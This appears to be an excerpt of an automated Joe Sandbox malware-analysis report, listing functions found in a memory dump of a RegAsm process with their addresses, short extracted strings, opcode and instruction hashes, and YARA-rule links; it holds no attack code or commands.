Download Yara Rule

Strings

. , xrefs: 0041CBA7

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: .
API String ID: 0-1505114982
Opcode ID: 25aa824990e0b099dbedb7f342dca715901da659ff19adf71e826704a6bc8dca
Instruction ID: df86e8cabfd52562b6ebe50b702b66c3677f2f48fb8aab21b174fbacb2a831e7
Opcode Fuzzy Hash: 25aa824990e0b099dbedb7f342dca715901da659ff19adf71e826704a6bc8dca
Instruction Fuzzy Hash: 8AB1F4B5E402128BCB248F68CC927A7B7B1FF55314F19915ED845AB790E738AC42C7D4

Function 00408160 Relevance: 1.6, Strings: 1, Instructions: 399COMMON

Download Yara Rule

Strings

-, xrefs: 00408285

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: 27c89adea84a4971459812ff31a4728146f694fcb44008b8af47e8cd9ff8a59b
Instruction ID: aabc77385ad2167f9f1bd1f95327a4f60466d98ac0e5edc62967ee21bdfad669
Opcode Fuzzy Hash: 27c89adea84a4971459812ff31a4728146f694fcb44008b8af47e8cd9ff8a59b
Instruction Fuzzy Hash: E5D12F31A087455BC718CE29C99016FBBD2AFD1320F188A3EE4E5573D5DB3C99068B86

Function 00409700 Relevance: 1.6, Strings: 1, Instructions: 351COMMON

Download Yara Rule

Strings

ABE4A45DB129FD4CDB71E32F12885CB3, xrefs: 004097D3

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: ABE4A45DB129FD4CDB71E32F12885CB3
API String ID: 0-3838766293
Opcode ID: ff3731471c5a2191c5a05658faba6c42204445524e7f8331b46cc9c8e8b982bc
Instruction ID: 2e87a28a76dba4f31cae47dba0fb7e22e1a8f98f0dc0d4366023ba0889080103
Opcode Fuzzy Hash: ff3731471c5a2191c5a05658faba6c42204445524e7f8331b46cc9c8e8b982bc
Instruction Fuzzy Hash: 35C105716083808BD318DF35C85066BBBE6EBD2314F14893DE4D697392DB39C90ACB56

Function 0040B44C Relevance: 1.6, Strings: 1, Instructions: 345COMMON

Download Yara Rule

Strings

h d", xrefs: 0040B73E

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: h d"
API String ID: 0-862628183
Opcode ID: 907832ec394077f3cb61ce921fa134c81a3c0afbaec0ddbe82e25e94bded95fe
Instruction ID: e7b26040d347b48bd15f509a2e92d141a5522c4f34e33ed28b849909e17f734e
Opcode Fuzzy Hash: 907832ec394077f3cb61ce921fa134c81a3c0afbaec0ddbe82e25e94bded95fe
Instruction Fuzzy Hash: 81B1CF79204700CFD3248F74EC91B67B7F6FB4A301F058A7DE99682AA0D774A859CB18

Function 0041D270 Relevance: 1.6, Strings: 1, Instructions: 327COMMON

Download Yara Rule

Strings

~, xrefs: 0041D33B

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: ~
API String ID: 0-1707062198
Opcode ID: c6e5f3a96d2a0d2092885be3190280842d6212ff46f1b7e7ee293dffb0663f1e
Instruction ID: fb8d2d24bbcf8da77d425a74861fbc6d37f4fcabb9a6f9815e5d7f96e75daac0
Opcode Fuzzy Hash: c6e5f3a96d2a0d2092885be3190280842d6212ff46f1b7e7ee293dffb0663f1e
Instruction Fuzzy Hash: E2A14772E042215FCB15CE2888806ABB7D1ABD5324F19823EECB99B3D2D634DD0697D1

Function 00426E50 Relevance: 1.6, Strings: 1, Instructions: 326COMMON

Download Yara Rule

Strings

RpB, xrefs: 00426FEB

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: RpB
API String ID: 0-664042118
Opcode ID: d81e78c847e0577fff4fe054f0d5c7df3a35ca67ad11338b1f5183c552fb7e2c
Instruction ID: f37ba1eb55105a71e6c02689e7a75f224f26334d47d5f70d86fb510902375083
Opcode Fuzzy Hash: d81e78c847e0577fff4fe054f0d5c7df3a35ca67ad11338b1f5183c552fb7e2c
Instruction Fuzzy Hash: 09B12532A0C391CFD314CF28E89072AB7E2BF8A711F1A4A6DE59597391C7349D45CB4A

Function 004252BA Relevance: 1.6, Strings: 1, Instructions: 303COMMON

Download Yara Rule

Strings

d1, xrefs: 004254D0

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: d1
API String ID: 0-4211392460
Opcode ID: edb911d7aecce0065a01ffc3dd7ddc49175b84e24517e95a1a2a614b98ad95cb
Instruction ID: 74c04020a71521c8b9984734295d0b81cdc6df3862d17ec890c7cf8b211da757
Opcode Fuzzy Hash: edb911d7aecce0065a01ffc3dd7ddc49175b84e24517e95a1a2a614b98ad95cb
Instruction Fuzzy Hash: 409112B5618200DFD714DF24E881A7BB7A0FB8A705F84593EF48693361DB38C9158B4A

Function 0042B12C Relevance: 1.5, Strings: 1, Instructions: 268COMMON

Download Yara Rule

Strings

Fg, xrefs: 0042B257

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: Fg
API String ID: 0-875302535
Opcode ID: cec98c6035f8278796335b79b8fe425f66d685e3fc2c40d87c06063720ff0d23
Instruction ID: 81bd39487229f81fa75b1a19b8121f8c05985a2d1a0f7b16a24bef680633e699
Opcode Fuzzy Hash: cec98c6035f8278796335b79b8fe425f66d685e3fc2c40d87c06063720ff0d23
Instruction Fuzzy Hash: 6F81E47121D3808BE768CF25C8657ABBBD2EBD2304F58896DC1C987392DB38440ACB56

Function 00405EB0 Relevance: 1.5, Strings: 1, Instructions: 265COMMON

Download Yara Rule

Strings

,, xrefs: 00405FE6

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: ,
API String ID: 0-3772416878
Opcode ID: 735cee050c0adee449850ba2ce1bb04225bd749ef176fa0d293106b9e62c3734
Instruction ID: 6b9defcb35fa499ff27616791264c6e5e8496363bec20089c87d7e70d31ec12b
Opcode Fuzzy Hash: 735cee050c0adee449850ba2ce1bb04225bd749ef176fa0d293106b9e62c3734
Instruction Fuzzy Hash: 72B136701087819FC321CF18C88061BBBE0AFA9704F444E6EF5D997382D635E918CBA7

Function 0041B0E1 Relevance: 1.5, Strings: 1, Instructions: 264COMMON

Download Yara Rule

Strings

js{g, xrefs: 0041B34C

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: js{g
API String ID: 0-1014319796
Opcode ID: 9c18fcfdf183d3e6e2325b026543344db9fcf0b9b7ccceb31fbfaeb5f3b5c64c
Instruction ID: 14be18684298a51b6f1365b8eea6b5aba3066a4a8cfe6059be97ad669d3f7baa
Opcode Fuzzy Hash: 9c18fcfdf183d3e6e2325b026543344db9fcf0b9b7ccceb31fbfaeb5f3b5c64c
Instruction Fuzzy Hash: FF815671650B804BE7398F35C8517ABBBE2AB56718F08895DD4D39BB85C378E406CB44

Function 0041714B Relevance: 1.5, Strings: 1, Instructions: 263COMMON

Download Yara Rule

Strings

gfff, xrefs: 004172F2

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID: gfff
API String ID: 2994545307-1553575800
Opcode ID: a0da0e1a58219443cd6ae0c7bfd152e4ce8a5e9250f758d58d558c5ed45439cf
Instruction ID: c6a45f7a1688543314b9a3a30fef6f223fff4d1289bb41df6adbe344278a34bf
Opcode Fuzzy Hash: a0da0e1a58219443cd6ae0c7bfd152e4ce8a5e9250f758d58d558c5ed45439cf
Instruction Fuzzy Hash: 0F81D2717147418FD325CB39CC50BA6BBE2AB95308F18C57ED096CB7A6EA78A842C744

Function 0043D2F0 Relevance: 1.5, Strings: 1, Instructions: 247COMMON

Download Yara Rule

Strings

ihgf, xrefs: 0043D315

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID: ihgf
API String ID: 2994545307-2948842496
Opcode ID: ab1477d1033f8dec076903ebca1be19e8e3099a8087cf93edb3e20610523f821
Instruction ID: 39294a001ccb7b60b57bd072fead094b817a0247c43ae1e4845dbb8435dacfda
Opcode Fuzzy Hash: ab1477d1033f8dec076903ebca1be19e8e3099a8087cf93edb3e20610523f821
Instruction Fuzzy Hash: 5B81C274A04201AFD714CF28E881A6BB7F2FF99314F15A52DE5858B3A1DB35EC11CB46

Function 0042A3D0 Relevance: 1.5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

Strings

", xrefs: 0042A5CE

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
Instruction ID: 4b2f630bb6a68757ad0504ce5be77257e5761d12b45ca5ba0373d51c8e5240e3
Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
Instruction Fuzzy Hash: 22710532B083259BD714CE28E88431BB7E2ABC5710F99852EEC948B391D379DC55878B

Function 00424502 Relevance: 1.5, Strings: 1, Instructions: 232COMMON

Download Yara Rule

Strings

DB, xrefs: 00424795

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: DB
API String ID: 0-3908451873
Opcode ID: d605064758935f16ad6935a6e04185f2643797c2b9515f21a60167d82474eb99
Instruction ID: 63fe74dcdf674bdd3faef37b2e0283437cd793175f1af46cf0498e51130e9ee1
Opcode Fuzzy Hash: d605064758935f16ad6935a6e04185f2643797c2b9515f21a60167d82474eb99
Instruction Fuzzy Hash: A381B67AF04225CBCB18CF64D8905AEB7B2FFDA710F59806AC841AB355DB349D42CB54

Function 00424A74 Relevance: 1.5, Strings: 1, Instructions: 206COMMON

Download Yara Rule

Strings

LB, xrefs: 00424CE6

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: LB
API String ID: 0-539997225
Opcode ID: d02495da20a3f8a7219353459d550f72d20704d827e4251e17801bf690faaf74
Instruction ID: 190c79d128488961cfb389f9b0ffad8fedd0031ada35975bf34f4c17adb32e46
Opcode Fuzzy Hash: d02495da20a3f8a7219353459d550f72d20704d827e4251e17801bf690faaf74
Instruction Fuzzy Hash: D1618E31B412228BDB18CF29E8A12FBFBE2EF91310B58466ED4574B3C1D7389941D799

Function 0041DD50 Relevance: 1.4, Strings: 1, Instructions: 199COMMON

Download Yara Rule

Strings

Y*>, xrefs: 0041DD54

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: Y*>
API String ID: 0-3862480330
Opcode ID: 22b3804befe7f91e84aca949ffb80fce2ed22dd13d93b44656185de14de2ea60
Instruction ID: 90e50e1672eaf7fe8d97f2f09bdb4033b3ef25f85dbdb073c688402916a0328e
Opcode Fuzzy Hash: 22b3804befe7f91e84aca949ffb80fce2ed22dd13d93b44656185de14de2ea60
Instruction Fuzzy Hash: 4C510573F499814BD72C893C5C223EAAA834BD6234B2DD77BE4B2CB3E4D5698C464345

Function 0043A777 Relevance: 1.4, Strings: 1, Instructions: 129COMMON

Download Yara Rule

Strings

w, xrefs: 0043A869

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: w
API String ID: 0-2991200456
Opcode ID: 6ffcd2417d58e0d1efea5a9724b595c411f337b55a8ae22910b9b44be8581fce
Instruction ID: 72f7098589d43736da4273b9d7e3299e197f10f25cbeea51759b9c2434ba13e7
Opcode Fuzzy Hash: 6ffcd2417d58e0d1efea5a9724b595c411f337b55a8ae22910b9b44be8581fce
Instruction Fuzzy Hash: 8E4119B6E116558FD704DFA4CC855ABBB72FB88315B1AC1A8C8847B319D77868078BD0

Function 0043CE90 Relevance: 1.4, Strings: 1, Instructions: 112COMMON

Download Yara Rule

Strings

ihgf, xrefs: 0043CEB5

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID: ihgf
API String ID: 2994545307-2948842496
Opcode ID: 43b7dcd72b74260400957a7b37b74b5e300ce905b31fc695f742453478a8ea1b
Instruction ID: 0aea9c019cfcbf9c29137c9c12aa4ed540cc4986b7a763f7409eb823f2adcf13
Opcode Fuzzy Hash: 43b7dcd72b74260400957a7b37b74b5e300ce905b31fc695f742453478a8ea1b
Instruction Fuzzy Hash: 9831D474308300AFE7109B249CC1B3BF7A6EB8A718F24692EE584A72D1D665EC10875A

Function 004143C2 Relevance: .8, Instructions: 805COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ffcb586982cb18347a88d56587a7455aea838f8e5703d59131cd49a89af27b5
Instruction ID: d6216dced0a3b9436857ee0068e0dff51503e5ecb223af83f8720e1cf69b390d
Opcode Fuzzy Hash: 0ffcb586982cb18347a88d56587a7455aea838f8e5703d59131cd49a89af27b5
Instruction Fuzzy Hash: F02242B56082009FE7149F24EC41B6B73A2FBDB300F55893EF6C487292DA799C41CB4A

Function 00416BA5 Relevance: .7, Instructions: 688COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a7678f017f308848797c1ab2fc33ccddf339249d7514e43f7e0819896a5eda0
Instruction ID: 9c79f7e63c480dd40f7a7ccc60d41b21814d9940eb0dc65dd07d8a453e372cf2
Opcode Fuzzy Hash: 5a7678f017f308848797c1ab2fc33ccddf339249d7514e43f7e0819896a5eda0
Instruction Fuzzy Hash: 16120E35204B018FD325CF29C8907A3BBE2EF9A314F19866DD4DA8B795D738E846CB54

Function 00402FA0 Relevance: .7, Instructions: 670COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2cf22539860d374f1b5b70c1f2b7734314ec6e2843ab381a6f5f63b3db803864
Instruction ID: b7901f3288d9e4572b9bc57ce4c79cacd886df45a950704f10474c7163005246
Opcode Fuzzy Hash: 2cf22539860d374f1b5b70c1f2b7734314ec6e2843ab381a6f5f63b3db803864
Instruction Fuzzy Hash: CE52F4715083458FCB14CF18C0806AABFE1BF89315F18867EF8996B391D778EA49CB85

Function 004066E0 Relevance: .7, Instructions: 665COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f260d4ba8b532cff43b70e0305cc444787dac05339277c8b44483d328b2ca1f5
Instruction ID: f9402e00db0146810cf529bce4eeb96ef771652ee20e7226bad8efb3fef3d353
Opcode Fuzzy Hash: f260d4ba8b532cff43b70e0305cc444787dac05339277c8b44483d328b2ca1f5
Instruction Fuzzy Hash: DA52C7B0A08B848FE735CB24C4843A7BBE1AB51314F15893FD5E716BC2C27DA995C71A

Function 0041F0E0 Relevance: .6, Instructions: 640COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 384453c34c44fa10a221719aff1fe9f2af50c5f2060accd689493d508a0f7137
Instruction ID: d272bb6b5d6e2c7a5f0cafe8b1d1f27913d4ef5c9ad92f98558892845c7f91e7
Opcode Fuzzy Hash: 384453c34c44fa10a221719aff1fe9f2af50c5f2060accd689493d508a0f7137
Instruction Fuzzy Hash: B5625CB0608B818ED325CF3C8855797BFE5AB5A314F048A5DE0EE873D2C7B96405CB66

Function 004039C0 Relevance: .6, Instructions: 600COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 678ad88440436fc2347c77ec1617077ed1d00620730d0d2d7e6321ebe71b5d32
Instruction ID: 3fdae14cd15e0c33f5e2b36ae0900265362ef596646a5ff17c50a816546e4c47
Opcode Fuzzy Hash: 678ad88440436fc2347c77ec1617077ed1d00620730d0d2d7e6321ebe71b5d32
Instruction Fuzzy Hash: ED323370914B118FC328CF29C68052ABBF5BF85711B604A2ED697A7F90D73AF945CB08

Function 004074B0 Relevance: .6, Instructions: 595COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d94ed56ffcdc38c94b90bd9783928bf4a55e001c4d3c4371622baab0c0238d3b
Instruction ID: 1131e2afb1b9b7a06d06e0851762e967182e12a53f43e8bd2da4f6050e1e8ff1
Opcode Fuzzy Hash: d94ed56ffcdc38c94b90bd9783928bf4a55e001c4d3c4371622baab0c0238d3b
Instruction Fuzzy Hash: C802C732A0C7118BC724DE18D8816ABB3E2EBD4345F19893ED586A73C5D738B815CB4B

Function 004180A9 Relevance: .4, Instructions: 449COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f294011623701e8b9ed5bfd878411dd116e2deaf0e85f456f0db657ca5256693
Instruction ID: 6564eefc0a79269b3db00a3a3e2fdb8cf1d61b2510fe7412d98733e2447c0821
Opcode Fuzzy Hash: f294011623701e8b9ed5bfd878411dd116e2deaf0e85f456f0db657ca5256693
Instruction Fuzzy Hash: 6CC128342047418FD7258F28C890AA7BBE1FF9B310F58896ED4D6477A2CB75E846CB58

Function 0043C280 Relevance: .4, Instructions: 422COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7dd1dd3bcd13b84c911ff83a91c1cc82912ef431115ec00b7fd8cedab479074d
Instruction ID: 2610ce8d2ada8b42ce1f8a49459609e4fff09a6b757421d9f45879ca41997f09
Opcode Fuzzy Hash: 7dd1dd3bcd13b84c911ff83a91c1cc82912ef431115ec00b7fd8cedab479074d
Instruction Fuzzy Hash: A8D10E36A187508FC704CF28D8D162AB7E2BBCE314F09897DE98687396D738D905CB46

Function 0043C1F0 Relevance: .4, Instructions: 406COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cfd12deba1f5b1e185dc8cea1c4f0dd34181c3b18da48610411f741cad837184
Instruction ID: b593eabd3734573ca464a0f0c89662c3852b345cc910da406a972fedca83911a
Opcode Fuzzy Hash: cfd12deba1f5b1e185dc8cea1c4f0dd34181c3b18da48610411f741cad837184
Instruction Fuzzy Hash: CDC1ED3AA18611CFC704CF28D8D066AB7E2FB8E315F19887DE98687352D738D945CB46

Function 004059F0 Relevance: .4, Instructions: 400COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f2680bab9b6854d00e0753734e73372bb980c2eb61b62fe20cb4c3e0bac24b1
Instruction ID: 93b8c5387be001e94cab0129f885dbabef0bc68014b552001e05b684e15851e5
Opcode Fuzzy Hash: 9f2680bab9b6854d00e0753734e73372bb980c2eb61b62fe20cb4c3e0bac24b1
Instruction Fuzzy Hash: 48E19A712087418FD720DF29C880A6BBBE1EF99304F44882EE4D597792E379E944CB96

Function 004166A0 Relevance: .4, Instructions: 377COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f471f3d39aca677c1a2c39babe6ca4d167e6e7ed24f73cd0afd5c860e5d8b012
Instruction ID: 32691a19542b475e5b32abf01bf61a59727b98503660fe5e1cf9ea7214f750c2
Opcode Fuzzy Hash: f471f3d39aca677c1a2c39babe6ca4d167e6e7ed24f73cd0afd5c860e5d8b012
Instruction Fuzzy Hash: FBC1CEB4600302CFD7248F25C8917A2BBB1FF46314F1986ADD4964F792E778E885CB95

Function 00428BC0 Relevance: .4, Instructions: 370COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf8f587253e202915e805cc75018ac22b9bd56b94549da316b175cb94c1d98b7
Instruction ID: f9929a72ce68a40c3f81f5f1acad1d241ce5af9a0f8176ac8c595b8a2b44423d
Opcode Fuzzy Hash: cf8f587253e202915e805cc75018ac22b9bd56b94549da316b175cb94c1d98b7
Instruction Fuzzy Hash: EDD15535B05255CFDB14CFB8E8816AEBBB2AF1A300F58417DE551A7392CB388E05CB59

Function 004192DA Relevance: .4, Instructions: 362COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07b520a97f650d78ec3e4206198fbb7b152170e0c1bb9b71eb1cf8cd26d43cec
Instruction ID: c7afa36b394fec79d3864c076b52a9d2828a05187d2106694a5d2b7072183649
Opcode Fuzzy Hash: 07b520a97f650d78ec3e4206198fbb7b152170e0c1bb9b71eb1cf8cd26d43cec
Instruction Fuzzy Hash: 30A11571205701CFD329CF28C4A19A777E2FF8A310719869DD4A68B3A5EB38AC41CB54

Function 00414070 Relevance: .3, Instructions: 346COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5eec315c10c9a67952a9793dbef498c3585f4719540dfb14f25a11beae5eb4f2
Instruction ID: 3a875cd6648c61770c451858fbf1e99b01c2ef70bfb09da3693ab00193ad4cb1
Opcode Fuzzy Hash: 5eec315c10c9a67952a9793dbef498c3585f4719540dfb14f25a11beae5eb4f2
Instruction Fuzzy Hash: 478134B15143048BC728DF24D8A26B7B3F0EF95354F08892EE98687391F738D989C766

Function 0041D5E0 Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cf664f652a807fb332ea88b5576aae59d3ab4033112652d5c76049a14ce75c6
Instruction ID: 4462778536881e7fad7e7429092b9e4e0939b3ac367c8c146f109192ca963606
Opcode Fuzzy Hash: 6cf664f652a807fb332ea88b5576aae59d3ab4033112652d5c76049a14ce75c6
Instruction Fuzzy Hash: 22B1E4B5D04301AFD7109F24CC42B5BBBE1ABD5318F144A3EF8D8A32A1D7399945DB8A

Function 00435890 Relevance: .3, Instructions: 310COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34b9a0d7ad4e2640ff3c38ec8b4415170da73e2657f5b2be8b12e8c2df11fb82
Instruction ID: 82f263c77167ee55bcd91cd3b2c817a9180a54af617eadf61d99f91933eb0c98
Opcode Fuzzy Hash: 34b9a0d7ad4e2640ff3c38ec8b4415170da73e2657f5b2be8b12e8c2df11fb82
Instruction Fuzzy Hash: 28B15B72E04B918FC715CA7CCC8169ABFB25B9B230F1DC399D4A5DB3D6C63998028761

Function 00406250 Relevance: .3, Instructions: 303COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1afe4e88f9b97e7e8e8fd3cb907a0d95dd7110aea04d164d9c56f244693baaf
